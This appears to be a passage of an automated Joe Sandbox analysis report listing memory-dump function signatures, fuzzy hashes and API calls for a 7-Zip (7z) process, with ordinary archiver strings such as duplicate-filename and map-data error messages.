                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                                                                                                                                                                                        • Instruction ID: 116ca07cdd274c067c0624735566979fa8340085b4009c4ea013c1383bbb31b5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: deeb8322bb3e31c61ea61dbc074885bb59698c861cc3d3bf43e6ee2464223888
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7921487370424096C728DB2AB840A5A72D4F745FA4F20D269FE7E47784EB38CA42D740
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memmove.MSVCRT(?,?,?,?,?,00B79B61), ref: 00B7911C
                                                                                                                                                                                                          • Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
                                                                                                                                                                                                          • Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionThrowmallocmemmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2847158419-0
                                                                                                                                                                                                        • Opcode ID: 82b4f0498024add381b52464ee5401255b55fdf908ae796dc16d5b0bf27a9309
                                                                                                                                                                                                        • Instruction ID: b966159ce8c3161c55a3e5f91313dbe404fe827b523e8d322f6d60fb0b88ba15
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 82b4f0498024add381b52464ee5401255b55fdf908ae796dc16d5b0bf27a9309
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D216D37202B4495DB11DF1AE91472AB3A0E785FA8F59C265DF6C07394DF39C4A6C740
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                                                        • Opcode ID: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                                                                                                                                                                                        • Instruction ID: 84bd88b19a5c4e6f684c17bcb9fe6e35e96cc9314e5dd95e5ac69e5ffca71386
                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb002aa5dddfab1f6f72238e3db67cd756069b3d051d820f05e845315efd0b1d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4D112B627157518ECB328B6CA490328AAD3F740787B5440FADFCA87610D665CCDE9241
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00B7419C: free.MSVCRT ref: 00B741B9
                                                                                                                                                                                                          • Part of subcall function 00B7419C: free.MSVCRT ref: 00B741C5
                                                                                                                                                                                                          • Part of subcall function 00B7419C: free.MSVCRT ref: 00B741D1
                                                                                                                                                                                                          • Part of subcall function 00B7419C: free.MSVCRT ref: 00B741DD
                                                                                                                                                                                                          • Part of subcall function 00B7419C: free.MSVCRT ref: 00B741E6
                                                                                                                                                                                                          • Part of subcall function 00B7419C: free.MSVCRT ref: 00B741EF
                                                                                                                                                                                                          • Part of subcall function 00B7419C: free.MSVCRT ref: 00B741F8
                                                                                                                                                                                                        • free.MSVCRT ref: 00B83F45
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                                                                                                                                                                                        • Instruction ID: 2a4f7fbc44b14835f175f7737aea5b4297de9e741f9773f66a8517faecf0b2fb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9f8a1d2c49b0bee4d130ff5c6d2e38f6001c7bac36fe86653caaa0f784b82661
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67014C73A21790CACB21AF1DC18116DBBA4F759FE83689156EB4907770E732C883C7A1
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                                                                                                                                                                                        • Instruction ID: 1efd327bad793090a60e4c41d3b83487162a411406b81571dc67cb1468f144c7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0cb8849b5f1b8dcf8495defb4a02ef2f2e9066f911d13bd2e7f25b7badd2a547
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9401AD7631220086E710CF14C52C35E3BA0B3D1B68F140288DBA80B3D1CB7AC54ECF90
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                                                                                        • Opcode ID: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                                                                                                                                                                                        • Instruction ID: 818b2dab17af55f80b75575982955b743e3a92bd5d49feecc4701aedf508d1af
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 72e9e68ca430013701742a141a95d2249b3bc08b53a58632590991780ceaea4c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CAF0EC5231024D4BCB00DF7999C136821E2FB44796F9014B5DF4587602D928CCDD8714
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00B589D8: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 00B589EA
                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00B5CB49
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseErrorHandleLast
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 918212764-0
                                                                                                                                                                                                        • Opcode ID: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                                                                                                                                                                                        • Instruction ID: 341b7d5fa091b0724abeb18ffd402366025a0781b1646033579a626889fe50d7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a07007c1e2871dab96c79eb06679e0159d305b21fb5ff06fcf71a401af31ebbf
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E5D02B407501988AEB105AF958C233410C3E718713F9014F5DE5BD6203E41C8CCE6229
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: memmove
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2162964266-0
                                                                                                                                                                                                        • Opcode ID: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                                                                                                                                                                                        • Instruction ID: df18826beef6b853b09cc571df0f4c0776c214ad545573cdbed78c19e9ac7ff1
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ead37c245d68de3b924b300fd151c9469a6fa14fdf63e67ea49c121c3f4112c9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 18D05EAA7516C886CA049B2BD68151DA3219B89FD5718D0749F080B70ACE20C8E58740
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,FFFFFFFF,?,?,?,00000003,?,00000000,00000000), ref: 00B589EA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CloseHandle
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                                                                                        • Opcode ID: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
                                                                                                                                                                                                        • Instruction ID: 3ed05938d569657fbe9751a3690aa10db586d45bd44724d6adad0ef828290e8c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7026176aaa05c1561b6c1c0339a02e34eafe156cfb338b490f72a4c876cde8b9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9D0A77260198580DB261FBEC8403343391E754B75F185350CEB04A2D0DF2489CA8301
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                                                                                                                                                                                        • Instruction ID: 2166b5d2cda0b8a339828f3ddde091d83289321c476f07d570eefdeb07c00686
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 05270de921355061923bde3ca11a4f499c626c5521d971614da1d539e5086f1e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0BC08C027833480AC90A222B6F8732C02834F8EBD3E4C50E09E481BB52DA548CEA8B00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$memmove
                                                                                                                                                                                                        • String ID: Can not open mapping$Incorrect Map command$Map data error$MapViewOfFile error$Unsupported Map data$Unsupported Map data size
                                                                                                                                                                                                        • API String ID: 1534225298-798110030
                                                                                                                                                                                                        • Opcode ID: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
                                                                                                                                                                                                        • Instruction ID: 2590fe03271e5af674f62e737a5279d6016946edc2037b73d4ac2ecbd1922350
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 514f4a55c9b7f830d527a1e71fc81ac4b18dd3f2c8c4aaf2250e63e43436fdca
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FCC15072225A4186CB10EF11F89076EB7A1F7D6B91F5411B2EF8A43B69DF78C449CB40
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                                                                                        • Opcode ID: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
                                                                                                                                                                                                        • Instruction ID: 154b90396b0630a25fc402f30da4da5f2539aec006a7b57227ec4185583445c5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09bc4f2532211b0a1dcd74d5bcbdcf73cd8d77d2c3735b1cacf78fea39811e06
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67D11B7620AAC485CA34EF26E4606AE77A0F7C6B85F0551D2DF9E53B25CE38C849CB04
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Process$AddressCurrentProc$fputs$HandleLibraryLoadModuleTimesmemset
                                                                                                                                                                                                        • String ID: MCycles$GetProcessMemoryInfo$Global $H$K32GetProcessMemoryInfo$Kernel $Physical$Process$Psapi.dll$QueryProcessCycleTime$User $Virtual $kernel32.dll
                                                                                                                                                                                                        • API String ID: 600854398-319139910
                                                                                                                                                                                                        • Opcode ID: 4de089bbcb59170ecffb44d8e6b4bb1020c1b67aaf46552131cc09be39bde8ef
                                                                                                                                                                                                        • Instruction ID: 4c234feb1c61e5e11a68452f451a04bb3fd65c1ae08bccb1a6f9b0ee98a17960
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4de089bbcb59170ecffb44d8e6b4bb1020c1b67aaf46552131cc09be39bde8ef
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E517FA5305A8696EE20DBA5F8907A973A0F789B90F444036DE4D83769EF3CC549C750
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: fputs$free$memset$strlen$memmove
                                                                                                                                                                                                        • String ID: data:
                                                                                                                                                                                                        • API String ID: 527563900-3222861102
                                                                                                                                                                                                        • Opcode ID: 4b6c5f9cdd3633745e31563a8c4377074848a1f4c9f847770a3d002162f2b606
                                                                                                                                                                                                        • Instruction ID: dbc0b66524ef90ad6a3912481650327051209be182a2c26e48d4bcc11e100cfe
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4b6c5f9cdd3633745e31563a8c4377074848a1f4c9f847770a3d002162f2b606
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 51022432209681D7DF20DF29E8907AE77E0F795B88F4450A1EF4A47669DB78CA49C740
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00B8FAAC
                                                                                                                                                                                                        • free.MSVCRT ref: 00B8FAC0
                                                                                                                                                                                                        • free.MSVCRT ref: 00B8FC43
                                                                                                                                                                                                          • Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
                                                                                                                                                                                                          • Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F
                                                                                                                                                                                                          • Part of subcall function 00B8F820: _CxxThrowException.MSVCRT ref: 00B8F88D
                                                                                                                                                                                                        • free.MSVCRT ref: 00B90031
                                                                                                                                                                                                          • Part of subcall function 00B8F8B8: memmove.MSVCRT ref: 00B8F91E
                                                                                                                                                                                                          • Part of subcall function 00B8F8B8: free.MSVCRT ref: 00B8F926
                                                                                                                                                                                                          • Part of subcall function 00B8F93C: memmove.MSVCRT ref: 00B8F992
                                                                                                                                                                                                          • Part of subcall function 00B8F93C: free.MSVCRT ref: 00B8F99A
                                                                                                                                                                                                        • free.MSVCRT ref: 00B900EA
                                                                                                                                                                                                        • free.MSVCRT ref: 00B900F2
                                                                                                                                                                                                        • free.MSVCRT ref: 00B90101
                                                                                                                                                                                                        • free.MSVCRT ref: 00B9010A
                                                                                                                                                                                                        • free.MSVCRT ref: 00B90113
                                                                                                                                                                                                        • free.MSVCRT ref: 00B90121
                                                                                                                                                                                                        • _CxxThrowException.MSVCRT ref: 00B90184
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • Duplicate filename on disk:, xrefs: 00B8FCB4
                                                                                                                                                                                                        • Internal file name collision (file on disk, file in archive):, xrefs: 00B9015D
                                                                                                                                                                                                        • Duplicate filename in archive:, xrefs: 00B90149
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: free$ExceptionThrow$memmove$mallocmemset
                                                                                                                                                                                                        • String ID: Duplicate filename in archive:$Duplicate filename on disk:$Internal file name collision (file on disk, file in archive):
                                                                                                                                                                                                        • API String ID: 3338823681-819937569
                                                                                                                                                                                                        • Opcode ID: 05e571fda14d9d8926fc305dd0170e713781fc1b859d5d94d2c1757528fd9615
                                                                                                                                                                                                        • Instruction ID: e45c9fd727e8950c46b6f998e285fb2c60b90470cf34408b4471cd2a35693430
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 05e571fda14d9d8926fc305dd0170e713781fc1b859d5d94d2c1757528fd9615
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C12937321968587CB20EF25E48066EB7E1F389B90F504665EF9A47B68CF38D895CF00
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        • Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_b50000_7z.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 1eb9012123f2ce8eb073f9b3624da2f3a3289b8457f20c18abc7480cb7118cc2
                                                                                                                                                                                                        • Instruction ID: a249db0e6000c455ad39674d0bb92d979960d0f3201b874d884e2c8affc88cb7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1eb9012123f2ce8eb073f9b3624da2f3a3289b8457f20c18abc7480cb7118cc2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD022E32309B8196DA24DF25E4907AEB3A1F7C5B84F544166DB8E97B69DF7CC884CB00
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • DeviceIoControl.KERNEL32 ref: 00B58F7A
                                                                                                                                                                                                        • DeviceIoControl.KERNEL32 ref: 00B5905E
                                                                                                                                                                                                        • DeviceIoControl.KERNEL32 ref: 00B590B5
